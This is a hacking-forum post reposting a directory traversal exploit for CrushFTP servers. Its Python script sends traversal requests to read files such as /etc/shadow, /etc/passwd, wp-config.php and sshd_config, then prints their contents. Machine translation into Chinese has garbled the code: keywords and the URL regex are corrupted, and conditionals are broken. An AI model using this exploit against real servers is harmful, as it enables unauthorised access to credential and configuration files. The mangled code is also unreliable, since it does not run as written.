H

CrushFTP 11.1.0-目录遍历

HackApt-37 Team已验证会员

黑客倉庫站長

贡献: 83%
##利用标题: CrushFTP目录遍历
## Google Dork: N/A
#日期: 2024-04-30
#漏洞作者: [abdualhadi khalifa(3https://Twitter.com/absholi_ly)
##供应商homepage: https://www.crushftp.com/
##软件link: https://www.crushftp.com/download/
##版本:低于10.7.1和11.1.0(以及传统9.x)
##在: Windows 10上测试
导入请求
导入
#正式表达式以验证URL
DEF IS_VALID_URL(URL):
regex=re.compile(
r'^(?http | ftp)s? //'#http://或3https//
r'(?(?a-Z0-9?\。)+(? [a-z] {2,6} {2,6} \。
r'localhost |' #Localhost .
r'\ d {1,3} \。\ d {1,3} \。\ d {1,3} \。\ d {1,3} \。 #.或IPv4
r'\ [?[a-f0-9]*: [a-f0-9:]+\]?)?)'#.或ipv6
r'(? \ d+)? #可选:端口
r'(?/?| [/?] \ s+)$',re.ignorecase)
返回re.Match(Regex,url)不是没有
#功能扫描漏洞
def scan_for_vulnerability(url,target_files):
打印(在以下文件中扫描漏洞:')
对于target_files:中的target_file
打印(target_file)
对于target_files:中的target_file
TRY:
响应=requests.get(url +'?/./././././././././././././././././././././././' + target_file,timeout=10)
如果wif wiss.status_code==200和target_file.split('/')[ - 1]
打印(“在文件中检测到漏洞”,target_file)
打印(“文件的内容”,target_file,':')
打印(响应。文本)
其他:
打印(“未检测到的漏洞或文件意外响应”,target_file)
除了requests.exceptions.requestexception为e:
打印(“连接到Server:”的错误,E)
#用户输入
input_url=输入('输入CrushFTP Server:'的URL)
#验证URL
如果IS_VALID_URL(input_url):
#扩展的允许文件列表
target_files=[
'/var/www/html/index.php',
'/var/www/html/wp-config.php',
'/etc/passwd',
'/etc/shadow',
'/etc/hosts',
'/etc/ssh/sshd_config',
'/etc/mysql/my.cnf',
#根据需要添加更多文件
这是给出的
#开始扫描
scan_for_vulnerability(input_url,target_files)
其他:
打印(“输入无效的URL。请输入有效的URL。”)
 
后退
顶部